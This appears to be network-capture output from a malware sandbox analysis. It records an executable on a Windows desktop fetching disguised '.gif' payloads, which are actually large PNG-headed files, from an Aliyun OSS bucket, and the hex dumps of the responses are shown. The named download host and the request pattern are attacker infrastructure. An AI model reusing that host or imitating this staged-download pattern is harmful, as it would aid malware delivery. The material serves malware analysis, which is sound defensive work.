                                    2025-01-11 03:37:51 UTC4096INData Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a
                                    Data Ascii: _X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                    2025-01-11 03:37:51 UTC4096INData Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd
                                    Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                    2025-01-11 03:37:52 UTC4096INData Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93
                                    Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                    2025-01-11 03:37:52 UTC4096INData Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90
                                    Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                    2025-01-11 03:37:52 UTC4096INData Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1
                                    Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                    2025-01-11 03:37:52 UTC4096INData Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9
                                    Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                    2025-01-11 03:37:52 UTC4096INData Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac
                                    Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                    2025-01-11 03:37:52 UTC4096INData Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14
                                    Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                    2025-01-11 03:37:52 UTC4096INData Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52
                                    Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJR


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.124972139.103.20.1054436496C:\Users\user\Desktop\2976587-987347589.08.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-11 03:37:53 UTC111OUTGET /c.gif HTTP/1.1
                                    User-Agent: GetData
                                    Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-11 03:37:54 UTC545INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sat, 11 Jan 2025 03:37:54 GMT
                                    Content-Type: image/gif
                                    Content-Length: 10681
                                    Connection: close
                                    x-oss-request-id: 6781E79272AE9E33395CC15C
                                    Accept-Ranges: bytes
                                    ETag: "10A818386411EE834D99AE6B7B68BE71"
                                    Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 10287299869673359293
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                    x-oss-server-time: 8
                                    2025-01-11 03:37:54 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-11 03:37:54 UTC4096INData Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39
                                    Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
                                    2025-01-11 03:37:54 UTC3034INData Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27
                                    Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.124972239.103.20.1054436496C:\Users\user\Desktop\2976587-987347589.08.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-11 03:37:55 UTC111OUTGET /d.gif HTTP/1.1
                                    User-Agent: GetData
                                    Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-11 03:37:55 UTC547INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sat, 11 Jan 2025 03:37:55 GMT
                                    Content-Type: image/gif
                                    Content-Length: 3892010
                                    Connection: close
                                    x-oss-request-id: 6781E7935E341435366D7F6A
                                    Accept-Ranges: bytes
                                    ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                    Last-Modified: Fri, 10 Jan 2025 12:31:05 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 3363616613234190325
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                    x-oss-server-time: 54
                                    2025-01-11 03:37:55 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-11 03:37:55 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                    Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                    2025-01-11 03:37:55 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                    Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                    2025-01-11 03:37:55 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                    Data Ascii: -J;wuwu{}uG`uWu{Q6
                                    2025-01-11 03:37:55 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                    Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                    2025-01-11 03:37:55 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                    Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
